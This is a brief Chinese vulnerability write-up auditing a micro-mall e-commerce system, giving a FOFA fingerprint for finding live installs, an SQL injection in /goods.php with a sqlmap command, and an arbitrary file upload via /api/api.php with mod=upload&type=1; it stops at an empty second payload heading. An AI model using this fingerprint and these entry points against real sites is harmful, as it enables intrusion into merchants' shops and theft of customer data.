某蓝星抖音快手微商城RCE漏洞审计

 微商城系统，是一种小型电子商务系统。该系统融合了社交媒体的互动性和网络商城的交易功能，为商家提供了一个集商品展示、在线交易、营销推广、用户管理、数据分析等功能于一体的综合性电商平台。系统充分利用了微信的社交属性和广泛的用户基础，通过微信公众号或小程序等形式，为商家搭建起一个便捷的在线商城。用户无需下载额外应用，即可在微信内完成商品的浏览、选购、支付等操作，享受全方位的购物体验。

FOFA：

"/Mao_Public/js/jquery-2.1.1.min.js"

前台SQL注入漏洞：

位于 /goods.php 存在很明显的SQL注入漏洞，直接GET传入id参数，然后直接被带入到了查询之中.

Payload:

Python sqlmap.py -u "http://127.0.0.1/goods.php?id=*" --level=3 --dbms=mysql

前台任意文件上传漏洞：

位于 /api/api.php 存在一段很明显的任意文件上传漏洞，直接构造mod=upload&type=1即可上传任意文件

Payload: